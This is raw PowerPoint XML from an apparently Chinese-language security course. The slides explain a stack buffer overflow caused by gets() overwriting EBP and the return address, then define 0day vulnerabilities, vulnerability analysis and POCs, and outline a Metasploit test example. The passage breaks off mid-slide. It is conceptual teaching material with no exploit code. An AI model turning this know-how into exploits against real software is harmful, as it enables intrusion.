              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后，堆栈如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符串太长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>容纳不下，只好向内存顶部继续写“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”。由于堆栈的生长方向与内存的生长方向相反，这些“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”覆盖了堆栈的原来元素。不难发现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>已经被“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”覆盖了。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回的时候，就会把“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为返回地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会试图执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处的指令，结果出现错误。这就是一次典型的堆栈溢出。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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4396283" y="6273008"/>
            <a:ext cx="3398807" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>函数异常执行的堆栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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5121" name="Picture 1" descr="未命名-5"/>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381186" y="5041108"/>
            <a:ext cx="3429000" cy="12319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09554822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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出是由于字符串处理函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）没有对数组越界加以监视和限制，利用字符数组写越界覆盖堆栈中的老元素的值，从而修改返回地址。在上面的例子中，这导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>去访问一个不存在的指令，结果出错。事实上，当堆栈溢出的时候已经完全控制了这个程序下一步的动作，如果用一个实际存在的指令地址来覆盖这个返回地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就会转而执行该指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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xmlns="" val="182635679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8.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="52457399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8.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4033708"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>，早期的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>表示在软件发行后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>小时内就会出现破解版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>现在其含义已经得到了延伸，只要是在软件或者其它东西发布后，在最短时间内出现相关破解的，都可以叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>是一个统称，所有的破解都可以叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>的概念最早用于软件和游戏破解，属于非盈利性和非商业化的组织行为，其基本内涵是“即时性”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞是指已经被发现（有可能未被公开）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>而官方还没有相关补丁的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="68675179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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4223489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞分析是指在代码中迅速定位漏洞，弄清攻击原理，准确地估计潜在的漏洞利用方式和风险等级的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扎实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的漏洞利用技术是进行漏洞分析的基础，否则很可能将不可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成漏洞，或者将可以允许远程控制的高危漏洞误判为中级漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一般情况下，漏洞发现者需要向安全专家提供一段能够重现漏洞的代码，这段代码被称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以有很多种形式，只要能够触发漏洞执行。例如，它可能是一个能够引起程序崩溃的畸形文件，也可能是一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的不同，漏洞分析的难度也会有所不同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="86744316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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4223489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞分析是指在代码中迅速定位漏洞，弄清攻击原理，准确地估计潜在的漏洞利用方式和风险等级的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扎实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的漏洞利用技术是进行漏洞分析的基础，否则很可能将不可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成漏洞，或者将可以允许远程控制的高危漏洞误判为中级漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一般情况下，漏洞发现者需要向安全专家提供一段能够重现漏洞的代码，这段代码被称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以有很多种形式，只要能够触发漏洞执行。例如，它可能是一个能够引起程序崩溃的畸形文件，也可能是一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后，安全专家需要部署试验环境，重现攻击过程，并进行分析测试，以确定到底是那个函数、哪一行代码出现的问题，并指导开发人员制作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="78110902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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4223489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全专家常用的分析方法包括：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
